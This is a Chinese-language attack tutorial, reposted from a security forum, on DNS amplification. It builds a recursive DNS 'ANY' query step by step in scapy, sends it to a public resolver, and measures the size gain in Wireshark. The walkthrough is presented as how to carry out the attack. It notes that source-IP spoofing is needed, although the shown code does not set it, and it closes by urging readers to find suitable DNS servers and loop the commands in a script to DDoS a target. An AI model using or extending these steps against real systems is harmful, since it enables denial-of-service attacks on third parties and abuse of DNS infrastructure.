本文來自i春秋作者: 即刻安全
前言:
今天為大家介紹DNS放大攻擊。通過DNS服務器的遞歸查詢,我們可以利用少量的查詢流量,來獲得大量的返回數據流量。該攻擊方式需要結合IP地址偽造,同時需要DNS服務器支持遞歸查詢。下面我們來看看,如何實現攻擊?
0x00
首先,我們用 scapy 來構造一個完整的DNS查詢數據包。
i=IP()
i.display()

0x01
修改目標DNS地址。
i.dst="8.8.8.8"
i.display()

0x02
定義UDP包。
u=UDP()
u.display()

0x03
定義DNS包。
d=DNS()
d.rd=1
d.qdcount=1
d.display()

0x04
設置DNS查詢內容。
q=DNSQR()
q.qname="xxxxx.com"
q.qtype=255
q.display()

0x05
d.qd=q (把查詢內容賦給DNS的qd)
r=(i/u/d)
d.display()

0x06
最后我們來發送我們構建的數據包。
sr1(r)

0x07
我們打開 wireshark 來進行抓包。

后序:
通過 wireshark 的抓包我們可以看到,我們查詢時發送的數據包為 68 字節,但響應包為118字節。這樣就實現了,通過返回的大流量來達到對目標服務器的DDoS效果!當然這里返回的流量還不夠巨大,原因在于DNS服務器做了一定的限制。只要找到合適的DNS服務器,并將以上命令寫入腳本中循環執行,那么效果將更加明顯!下面是我們即刻安全的微信公眾號,歡迎大家關注!!
原文地址:http://bbs.ichunqiu.com/thread-12685-1-1.html?from=paper
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/60/
暫無評論